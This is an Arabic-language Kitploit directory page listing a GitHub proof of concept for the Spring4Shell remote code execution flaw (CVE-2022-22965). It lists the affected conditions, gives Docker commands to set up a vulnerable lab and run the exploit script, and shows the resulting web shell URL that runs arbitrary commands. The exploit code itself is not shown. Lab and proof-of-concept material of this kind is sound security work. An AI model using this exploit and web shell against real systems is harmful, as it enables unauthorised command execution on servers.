Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/netcode/spring4shell-cve-2022-22965-poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubnetcode/spring4shell-cve-2022-22965-poc

Spring4shell-CVE-2022-22965-POC

أخرى spring4shell (Spring core RCE) POC

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
332منذ 4 سنواتلم تتم المراجعة بعد
مشاركة

ثغرة Spring4shell RCE

تؤثر هذه الثغرة على Spring Core وتسمح للمهاجم بإرسال طلب HTTP مصمم خصيصًا لتجاوز الحماية في محلل طلبات HTTP في المكتبة، مما يؤدي إلى تنفيذ تعليمات برمجية عن بُعد.

مزيد من المعلومات هنا

لاستغلال هذه الثغرة، يجب توفر عدة شروط

  • استخدام JDK 9 أو أعلى
  • وجود Apache Tomcat كحاوية سيرفلت
  • التعبئة كملف WAR تقليدي (على عكس jar القابل للتنفيذ في Spring Boot)
  • استخدام الاعتماديات spring-webmvc أو spring-webflux
  • استخدام إصدارات Spring Framework من 5.3.0 إلى 5.3.17، ومن 5.2.0 إلى 5.2.19، أو الإصدارات الأقدم

POC

  • بناء صورة docker
root@kitploit:~
docker build . -t springshell-rce-poc
  • تشغيل حاوية docker
root@kitploit:~
docker run --rm -p 8081:8080 --name springshell-rce-poc springshell-rce-poc
  • تشغيل الاستغلال
root@kitploit:~
python exploit-poc.py --url "http://127.0.0.1:8081/"

الاستجابة المتوقعة

root@kitploit:~
exploiting
Shell URL:http://127.0.0.1:8081/tomcatwar.jsp?pwd=j&cmd=whoami

إذا قمت بالوصول إلى هذا الرابط، فسيتم تشغيل أي أمر تريده cmd=<whatyouwant>

إذا قمت بتسجيل الدخول عبر SSH إلى الحاوية، سترى أنه تم إنشاء ملف جديد tomcatwar.jsp

root@kitploit:~
docker exec -it springshell-rce-poc /bin/bash
ls /usr/local/tomcat/webapps/ROOT
تنزيل الأداة